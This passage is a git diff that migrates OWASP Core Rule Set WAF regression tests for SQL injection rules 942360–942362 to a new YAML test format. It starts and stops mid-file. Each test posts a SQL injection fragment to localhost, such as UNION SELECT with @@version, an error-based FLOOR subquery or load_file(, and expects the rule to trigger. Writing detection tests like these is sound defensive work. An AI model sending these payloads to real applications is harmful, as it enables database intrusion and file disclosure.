1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version)" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-38 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version)" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 38 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "(SELECT 4440 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(4440=4440,1))),0x7170716271,FLOOR" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-39 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "(SELECT 4440 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(4440=4440,1))),0x7170716271,FLOOR" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 39 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "2759399466.1534185336 -6863 union all select 1,1,1,1,1,1,1,1,1,CONCAT" - version: HTTP/1.0 - output: - log_contains: id "942360" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "2759399466.1534185336 -6863 union all select 1,1,1,1,1,1,1,1,1,CONCAT" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml index 7c36f4b..259cc79 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml @@ -1,126 +1,124 @@ --- meta: author: "Christoph Hansen, azurit" - description: None - enabled: true - name: 942361.yaml +rule_id: 942361 tests: - - test_title: 942361-1 + - test_id: 1 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "'alter a" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'alter a" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 2 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\" ALTER A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\" ALTER A" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 3 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "'ALTER A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'ALTER A" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 4 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "' alter/" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "' alter/" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 5 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\" UNION A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\" UNION A" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 6 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "'UNION A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'UNION A" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 7 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "' union/" - version: HTTP/1.0 - output: - log_contains: id "942361" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "' union/" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml index 97a2dc3..27c6d2d 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml @@ -1,552 +1,550 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler, azurit" - description: None - enabled: true - name: 942362.yaml +rule_id: 942362 tests: - - test_title: 942362-1 + - test_id: 1 desc: "concatenated basic SQL injection and SQLLFI" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # 23423 as "sdfsdfs" FROM table - data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 2 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select Char(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select Char(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 3 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CHAR(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 4 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT GROUP_CONCAT(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 5 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT group_cOnCat(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 6 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as cc FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as cc FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 7 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS orders FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS orders FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 8 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS `carrier_id` from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS `carrier_id` from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 9 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select load_file(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 10 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS Role FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS Role FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 11 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `edit_user_id` from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 12 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS val FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS val FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 13 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%60+REGEXP%20" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 14 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS 'Durchschnitt_Importzeit' FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS 'Durchschnitt_Importzeit' FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 15 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `OXTIMESTAMP` from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 16 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as col_0_0_ from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as col_0_0_ from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 17 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS `count` FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS `count` FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 18 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS schlagwoerter FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 19 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as User from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as User from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 20 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS t FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS t FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 21 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "(load_file(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "(load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 22 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as ExecuteTheseSQLCommands FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as ExecuteTheseSQLCommands FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 23 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS schlagwoerter FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 24 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `documentType` FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 25 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "! As' from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "! As' from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 26 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "; As not from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "; As not from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 27 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 